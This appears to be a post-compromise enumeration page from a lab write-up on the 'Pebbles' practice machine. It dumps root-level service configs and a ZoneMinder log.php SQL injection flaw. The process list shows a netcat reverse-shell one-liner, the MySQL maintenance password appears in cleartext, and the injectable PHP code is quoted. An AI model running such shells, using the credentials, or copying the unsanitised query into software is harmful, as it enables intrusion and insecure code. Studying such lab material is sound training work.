Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.
Firewall
root@pebbles:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate NEW,RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:http
ACCEPT tcp -- anywhere anywhere tcp dpt:3305
ACCEPT tcp -- anywhere anywhere tcp dpt:http-alt
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ftp state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:http state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:http state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:3305 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:3305 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:http-alt state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:http-alt state NEW,ESTABLISHED
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere Heavily enforced firewall
apache
root@pebbles:~# systemctl status apache2.service
● apache2.service - LSB: Apache2 web server
Loaded: loaded (/etc/init.d/apache2; bad; vendor preset: enabled)
Drop-In: /lib/systemd/system/apache2.service.d
└─apache2-systemd.conf
Active: active (running) since Thu 2025-01-30 02:48:50 EST; 1 months 10 days
Docs: man:systemd-sysv-generator(8)
Process: 1007 ExecStart=/etc/init.d/apache2 start (code=exited, status=0/SUCCE
Tasks: 37
Memory: 64.7M
CPU: 7min 17.531s
CGroup: /system.slice/apache2.service
├─ 1287 /usr/sbin/apache2 -k start
├─ 1302 /usr/sbin/apache2 -k start
├─ 1304 /usr/sbin/apache2 -k start
├─ 1305 /usr/sbin/apache2 -k start
├─ 1306 /usr/sbin/apache2 -k start
├─ 2016 /usr/sbin/apache2 -k start
├─ 9167 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.
├─ 9171 bash -iroot@pebbles:~# cat /etc/apache2cat /etc/apache2/ports.conf\
# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default.conf
Listen 3305
<IfModule ssl_module>
Listen 443
</IfModule>
<IfModule mod_gnutls.c>
Listen 443
</IfModule>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
Listen 80
Listen 8080
root@pebbles:~# cat /etc/apache2/apache2.conf | grep -v '^[#/]'
Mutex file:${APACHE_LOCK_DIR} default
PidFile ${APACHE_PID_FILE}
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 5
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
HostnameLookups Off
ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
Include ports.conf
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
AccessFileName .htaccess
<FilesMatch "^\.ht">
Require all denied
</FilesMatch>
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
IncludeOptional conf-enabled/*.conf
IncludeOptional sites-enabled/*.conf
root@pebbles:~# cat /etc/apache2cat /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:3305>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/auth
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:8080>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/tomcat
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>N/A
zoneminder
root@pebbles:~# systemctl statussystemctl status zoneminder.service
systemctl status zoneminder.service
● zoneminder.service - ZoneMinder CCTV recording and surveillance system
Loaded: loaded (/lib/systemd/system/zoneminder.service; enabled; vendor prese
Active: active (running) since Tue 2025-03-11 20:23:32 EDT; 1h 21min ago
Process: 2060 ExecStop=/usr/bin/zmpkg.pl stop (code=exited, status=0/SUCCESS)
Process: 2100 ExecStart=/usr/bin/zmpkg.pl start (code=exited, status=0/SUCCESS
Main PID: 2118 (zmdc.pl)
Tasks: 4
Memory: 54.0M
CPU: 1.968s
CGroup: /system.slice/zoneminder.service
├─2118 /usr/bin/perl -wT /usr/bin/zmdc.pl startup
├─2142 /usr/bin/perl -wT /usr/bin/zmfilter.pl
├─2147 /usr/bin/perl -wT /usr/bin/zmaudit.pl -c
└─2152 /usr/bin/perl -wT /usr/bin/zmwatch.pl/lib/systemd/system/zoneminder.service
root@pebbles:~# cat /lib/systemd/system/zoneminder.service
# ZoneMinder systemd unit file
# This file is intended to work with Debian distributions
[Unit]
Description=ZoneMinder CCTV recording and surveillance system
After=network.target mysql.service
Wants=mysql.service
[Service]
#User=www-data
Type=forking
ExecStart=/usr/bin/zmpkg.pl start
ExecReload=/usr/bin/zmpkg.pl restart
ExecStop=/usr/bin/zmpkg.pl stop
PIDFile=/var/run/zm/zm.pid
Restart=on-abnormal
[Install]
WantedBy=multi-user.targetmysql.service
mysql
root@pebbles:~# systemctl status mysql.service
systemctl status mysql.service
● mysql.service - MySQL Community Server
Loaded: loaded (/lib/systemd/system/mysql.service; enabled; vendor preset: en
Active: active (running) since Thu 2025-01-30 02:48:51 EST; 1 months 10 days
Process: 1156 ExecStartPost=/usr/share/mysql/mysql-systemd-start post (code=ex
Process: 1008 ExecStartPre=/usr/share/mysql/mysql-systemd-start pre (code=exit
Main PID: 1155 (mysqld)
Tasks: 39
Memory: 237.0M
CPU: 1.971s
CGroup: /system.slice/mysql.service
└─1155 /usr/sbin/mysqld
root@pebbles:~# cat /lib/systemd/system/mysql.service
# MySQL systemd service file
[Unit]
Description=MySQL Community Server
After=network.target
[Install]
WantedBy=multi-user.target
[Service]
User=root
Group=root
PermissionsStartOnly=true
ExecStartPre=/usr/share/mysql/mysql-systemd-start pre
ExecStart=/usr/sbin/mysqld
ExecStartPost=/usr/share/mysql/mysql-systemd-start post
TimeoutSec=600
Restart=on-failure
RuntimeDirectory=mysqld
RuntimeDirectoryMode=755User and Group attributes are set to root
root@pebbles:~# cat /etc/mysql/dcat /etc/mysql/debian.cnf
# Automatically generated for Debian scripts. DO NOT TOUCH!
[client]
host = localhost
user = debian-sys-maint
password = IaLWCaaBsNeSbJD3
socket = /var/run/mysqld/mysqld.sock
[mysql_upgrade]
host = localhost
user = debian-sys-maint
password = IaLWCaaBsNeSbJD3
socket = /var/run/mysqld/mysqld.sock
root@pebbles:~# cat /etc/mysql/mcat /etc/mysql/mysql.cnf | grep -v '^[#/]'
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/
root@pebbles:~# cat /etc/mysql/mcat /etc/mysql/my.cnf | grep -v '^[#/]'
cat /etc/mysql/my.cnf | grep -v '^[#/]'
[mysqld_safe]
socket = /var/run/mysqld/mysqld.sock
nice = 0
[mysqld]
user = root
pid-file = /var/run/mysqld/mysqld.pid
socket = /var/run/mysqld/mysqld.sock
port = 3306
basedir = /usr
datadir = /var/lib/mysql
tmpdir = /tmp
lc-messages-dir = /usr/share/mysql
skip-external-locking
bind-address = 127.0.0.1
key_buffer_size = 16M
max_allowed_packet = 16M
thread_stack = 192K
thread_cache_size = 8
myisam-recover-options = BACKUP
query_cache_limit = 1M
query_cache_size = 16M
log_error = /var/log/mysql/error.log
expire_logs_days = 10
max_binlog_size = 100M
sql_mode = NO_ENGINE_SUBSTITUTION
secure-file-priv=""
root@pebbles:~# cat /etc/mysql/mcat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v '^[#]'
[mysqld_safe]
socket = /var/run/mysqld/mysqld.sock
nice = 0
[mysqld]
user = root3
pid-file = /var/run/mysqld/mysqld.pid
socket = /var/run/mysqld/mysqld.sock
port = 3306
basedir = /usr
datadir = /var/lib/mysql
tmpdir = /tmp
lc-messages-dir = /usr/share/mysql
skip-external-locking
bind-address = 127.0.0.1
key_buffer_size = 16M
max_allowed_packet = 16M
thread_stack = 192K
thread_cache_size = 8
myisam-recover-options = BACKUP
query_cache_limit = 1M
query_cache_size = 16M
log_error = /var/log/mysql/error.log
expire_logs_days = 10
max_binlog_size = 100M
sql_mode = NO_ENGINE_SUBSTITUTION
secure-file-priv=""N/A
vsftpd
root@pebbles:~# systemctl status vsftpd.service
systemctl status vsftpd.service
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: e
Active: active (running) since Thu 2025-01-30 02:48:49 EST; 1 months 10 days
Process: 1065 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, s
Main PID: 1127 (vsftpd)
Tasks: 1
Memory: 540.0K
CPU: 1ms
CGroup: /system.slice/vsftpd.service
└─1127 /usr/sbin/vsftpd /etc/vsftpd.conf
root@pebbles:~# cat /lib/systemd/system/vsftpd.service
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target/etc/vsftpd.conf
root@pebbles:~# cat /etc/vsftpd.cat /etc/vsftpd.conf | grep -v '^[#/]'
listen=NO
listen_ipv6=YES
anonymous_enable=NO
local_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/var/run/vsftpd/empty
pam_service_name=vsftpd
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NON/A
SQL Injection
The /zoneminder/www/ajax/log.php file contains the SQL injection vulnerability
root@pebbles:/usr/share/zoneminder/www# cat ./ajax/log.php
<?php
[...REDACTED...]
$limit = isset($_POST['limit'])?$_POST['limit']:100;
$sql = 'SELECT * FROM Logs';
if ( count($where) )
$sql.= ' WHERE '.join( ' AND ', $where );
$sql .= " order by ".$sortField." ".$sortOrder." limit ".$limit;
$logs = array();
foreach ( dbFetchAll( $sql, NULL, $values ) as $log ) {
[...REDACTED...]
}/Practice/Pebbles/5-Privilege_Escalation/attachments/{4AB515B3-C64D-4D03-BC47-7222991C0C66}.png)
The $limit variable is directly inserted from $_POST['limit'] without validation, making it vulnerable to injection.